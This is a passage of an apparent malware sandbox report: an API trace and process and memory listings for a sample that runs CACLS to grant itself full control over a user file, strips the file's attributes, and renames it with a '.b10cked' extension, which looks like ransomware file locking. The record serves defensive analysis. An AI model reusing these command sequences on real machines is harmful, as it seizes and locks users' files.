-19 [0217.293] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0217.293] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0217.293] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0217.293] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0217.293] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0217.293] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0217.293] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0217.293] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0217.293] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0217.293] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0217.293] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0217.293] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0217.293] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0217.293] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0217.294] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0217.294] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0217.294] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0217.294] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0217.294] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0217.294] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0217.294] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0217.294] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0217.294] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0217.294] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0217.294] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0217.294] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0217.294] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0217.294] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0217.294] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0217.294] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0217.294] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0217.294] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0217.294] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0217.294] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0217.294] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0217.294] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0217.294] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0217.294] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0217.294] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0217.294] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0217.294] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0217.294] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0217.294] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0217.294] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0217.294] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0217.294] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0217.294] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0217.294] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0217.295] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0217.295] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0217.295] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0217.295] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0217.295] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0217.295] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0217.295] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0217.295] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0217.295] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0217.295] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0217.295] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0217.295] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0217.295] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0217.295] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0217.295] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0217.296] SetErrorMode (uMode=0x0) returned 0x0 [0217.296] SetErrorMode (uMode=0x1) returned 0x0 [0217.296] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3d1db8, lpFilePart=0x28ef44 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x28ef44*="Desktop") returned 0x18 [0217.296] SetErrorMode (uMode=0x0) returned 0x1 [0217.296] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f90640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0217.296] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0217.341] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f90640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0217.341] FindClose (in: hFindFile=0x3c0f38 | out: hFindFile=0x3c0f38) returned 1 [0217.342] FindClose (in: hFindFile=0x3c0f38 | out: hFindFile=0x3c0f38) returned 1 [0217.342] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0217.342] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0217.342] GetConsoleTitleW (in: lpConsoleTitle=0x28f1b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0217.342] InitializeProcThreadAttributeList (in: lpAttributeList=0x28f040, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x28f108 | out: lpAttributeList=0x28f040, lpSize=0x28f108) returned 1 [0217.342] UpdateProcThreadAttribute (in: lpAttributeList=0x28f040, dwFlags=0x0, Attribute=0x60001, lpValue=0x28f100, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x28f040, lpPreviousValue=0x0) returned 1 [0217.342] GetStartupInfoW (in: lpStartupInfo=0x28effc | out: lpStartupInfo=0x28effc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0217.342] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0217.343] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\Default\\Searches\\Indexed Locations.search-ms\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x28f09c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\Default\\Searches\\Indexed Locations.search-ms\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28f0e8 | out: lpCommandLine="CACLS \"C:\\Users\\Default\\Searches\\Indexed Locations.search-ms\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x28f0e8*(hProcess=0x50, hThread=0x4c, dwProcessId=0xc70, dwThreadId=0x67c)) returned 1 [0217.346] CloseHandle (hObject=0x4c) returned 1 [0217.346] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0217.346] GetEnvironmentStringsW () returned 0x3d0228* [0217.346] FreeEnvironmentStringsW (penv=0x3d0228) returned 1 [0217.346] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0217.422] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x28efdc | out: lpExitCode=0x28efdc*=0x0) returned 1 [0217.422] CloseHandle (hObject=0x50) returned 1 [0217.422] _vsnwprintf (in: _Buffer=0x28f124, _BufferCount=0x13, _Format="%08X", _ArgList=0x28efe8 | out: _Buffer="00000000") returned 8 [0217.422] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0217.422] GetEnvironmentStringsW () returned 0x3d2260* [0217.423] FreeEnvironmentStringsW (penv=0x3d2260) returned 1 [0217.423] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0217.423] GetEnvironmentStringsW () returned 0x3d2260* [0217.423] FreeEnvironmentStringsW (penv=0x3d2260) returned 1 [0217.423] DeleteProcThreadAttributeList (in: lpAttributeList=0x28f040 | out: lpAttributeList=0x28f040) [0217.423] GetConsoleTitleW (in: lpConsoleTitle=0x28f424, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0217.423] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f90640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0217.423] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0217.423] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f90640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0217.423] FindClose (in: hFindFile=0x3c0f38 | out: hFindFile=0x3c0f38) returned 1 [0217.423] FindClose (in: hFindFile=0x3c0f38 | out: hFindFile=0x3c0f38) returned 1 [0217.424] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0217.424] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0217.424] GetConsoleTitleW (in: lpConsoleTitle=0x28f1b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0217.424] InitializeProcThreadAttributeList (in: lpAttributeList=0x28f040, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x28f108 | out: lpAttributeList=0x28f040, lpSize=0x28f108) returned 1 [0217.424] UpdateProcThreadAttribute (in: lpAttributeList=0x28f040, dwFlags=0x0, Attribute=0x60001, lpValue=0x28f100, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x28f040, lpPreviousValue=0x0) returned 1 [0217.424] GetStartupInfoW (in: lpStartupInfo=0x28effc | out: lpStartupInfo=0x28effc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0217.424] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0217.424] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\Default\\Searches\\Indexed Locations.search-ms\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x28f09c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\Default\\Searches\\Indexed Locations.search-ms\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28f0e8 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\Default\\Searches\\Indexed Locations.search-ms\"", lpProcessInformation=0x28f0e8*(hProcess=0x4c, hThread=0x50, dwProcessId=0xbd0, dwThreadId=0x618)) returned 1 [0217.426] CloseHandle (hObject=0x50) returned 1 [0217.426] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0217.426] GetEnvironmentStringsW () returned 0x3d2260* [0217.427] FreeEnvironmentStringsW (penv=0x3d2260) returned 1 [0217.427] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0217.462] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x28efdc | out: lpExitCode=0x28efdc*=0x0) returned 1 [0217.462] CloseHandle (hObject=0x4c) returned 1 [0217.462] _vsnwprintf (in: _Buffer=0x28f124, _BufferCount=0x13, _Format="%08X", _ArgList=0x28efe8 | out: _Buffer="00000000") returned 8 [0217.462] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0217.462] GetEnvironmentStringsW () returned 0x3d2260* [0217.462] FreeEnvironmentStringsW (penv=0x3d2260) returned 1 [0217.462] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0217.462] GetEnvironmentStringsW () returned 0x3d2260* [0217.462] FreeEnvironmentStringsW (penv=0x3d2260) returned 1 [0217.462] DeleteProcThreadAttributeList (in: lpAttributeList=0x28f040 | out: lpAttributeList=0x28f040) [0217.463] _get_osfhandle (_FileHandle=1) returned 0x7 [0217.463] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0217.463] _get_osfhandle (_FileHandle=1) returned 0x7 [0217.463] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f841ac | out: lpMode=0x49f841ac) returned 1 [0217.463] _get_osfhandle (_FileHandle=0) returned 0x3 [0217.463] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f841b0 | out: lpMode=0x49f841b0) returned 1 [0217.463] SetConsoleInputExeNameW () returned 0x1 [0217.463] GetConsoleOutputCP () returned 0x1b5 [0217.463] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f84260 | out: lpCPInfo=0x49f84260) returned 1 [0217.463] SetThreadUILanguage (LangId=0x0) returned 0x409 [0217.463] exit (_Code=0) Process: id = "556" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea166c0" os_pid = "0xc70" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "555" os_parent_pid = "0xa0c" cmd_line = "CACLS \"C:\\Users\\Default\\Searches\\Indexed Locations.search-ms\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32427 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32428 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32429 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32430 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 32431 start_va = 0xd20000 end_va = 0xd28fff entry_point = 0xd20000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 32432 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32433 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32434 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32435 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 32436 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 32437 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 32438 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32439 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32440 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 32441 start_va = 0x560000 end_va = 0x56ffff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 32442 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32443 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 32444 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32445 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 32446 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32447 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 32448 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 759 os_tid = 0x67c Thread: id = 760 os_tid = 0xd74 Process: id = "557" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16340" os_pid = "0xbd0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "555" os_parent_pid = "0xa0c" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\Default\\Searches\\Indexed Locations.search-ms\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32449 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32450 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32451 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32452 start_va = 0x70000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 32453 start_va = 0x990000 end_va = 0x996fff entry_point = 0x990000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 32454 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32455 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32456 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32457 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 32458 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 32459 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 32460 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32461 start_va = 0xb0000 end_va = 0x116fff entry_point = 0xb0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32462 start_va = 0x170000 end_va = 0x17ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 32463 start_va = 0x220000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 32464 start_va = 0x71e30000 end_va = 0x71e4cfff entry_point = 0x71e30000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 32465 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32466 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 32467 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 32468 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32469 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 32470 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32471 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 32472 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 32473 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 32474 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 32475 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 32476 start_va = 0x320000 end_va = 0x3e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 32477 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 32478 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 761 os_tid = 0x618 Process: id = "558" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16340" os_pid = "0xa84" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\Searches\\INDEXE~1.SEA\" \"C:\\Users\\Default\\Searches\\Indexed Locations.search-ms.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32479 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32480 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32481 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32482 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 32483 start_va = 0x49fd0000 end_va = 0x4a01bfff entry_point = 0x49fd0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32484 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32485 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32486 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32487 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 32488 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 32519 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = 